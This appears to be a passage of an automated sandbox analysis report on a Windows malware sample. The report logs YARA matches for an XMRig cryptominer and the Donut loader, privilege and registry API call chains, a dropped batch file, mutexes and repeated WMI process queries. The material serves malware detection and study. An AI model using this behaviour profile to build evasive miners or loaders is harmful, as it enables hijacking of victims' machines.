        Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.mine.winEXE@157/47@1/2
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,94_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep,95_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep,97_2_0000000140002D4C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,56_2_004011AD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,56_2_004017A5
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e7WMhx18XN.exe.logJump to behavior
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6140
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2712:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5304:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7712:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3108:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\00513a1e-7249-4c11-a0ce-fe6099077778
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile created: C:\Users\user\AppData\Local\Temp\b.batJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exeJump to behavior
        Source: e7WMhx18XN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e7WMhx18XN.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Windows\System32\findstr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
